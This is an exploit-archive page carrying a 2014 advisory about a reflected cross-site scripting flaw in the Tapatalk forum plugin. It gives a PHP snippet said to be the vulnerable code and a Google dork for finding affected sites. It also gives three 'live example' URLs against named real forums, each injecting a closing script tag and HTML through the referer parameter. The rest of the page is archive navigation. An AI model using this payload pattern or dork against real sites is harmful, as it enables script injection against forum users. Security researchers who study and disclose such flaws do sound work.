Tapatalk Forum Cross Site Scripting

Tapatalk Forum Cross Site Scripting: Posted Apr 27, 2014; Authored by E. Burtay Sahin; Tapatalk Forum suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 253cd5c79575f7fb9259f5fda766b097a52ff591c1badea81b43b1012790918a; Download | Favorite | View

Tapatalk Forum Cross Site Scripting

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
Janissaries.Org                                
################################################################################## 

Exploit Title  : Tapatalk Universal Forum Application XSS Vulnerability (All Version)
Author      : E. Burtay Sahin
Author Mail    : admin@burtay.org 
Author Homepage : http://www.burtay.org
Community Hpage  : http://www.janissaries.org
Google Dork    : inurl:mobiquo
Vendor Homepage  : http://tapatalk.com/
Software Link  : http://tapatalk.com/activate_tapatalk.php
Version      : All Version

##################################################################################

P0C
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
    .'?referer='.urlencode($referer)
    .'&code='.urlencode($code)
    .'&board_url='.urlencode($board_url)
    .'&lang='.urlencode($lang)
    .$byo
    .'&callback=?';
<?php echo $ads_url; ?>

##################################################################################
3 Live Examples

1.)Version ip34_3.8.2
https://forums.plex.tv/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

2.)Version vb3x_4.3.2
http://forum.xda-developers.com/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

3.)Version pb30_4.4.0
http://www.passion-multirotor.fr/forum/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Tapatalk Forum Cross Site Scripting

Tapatalk Forum Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Tapatalk Forum Cross Site Scripting

Share This

Tapatalk Forum Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems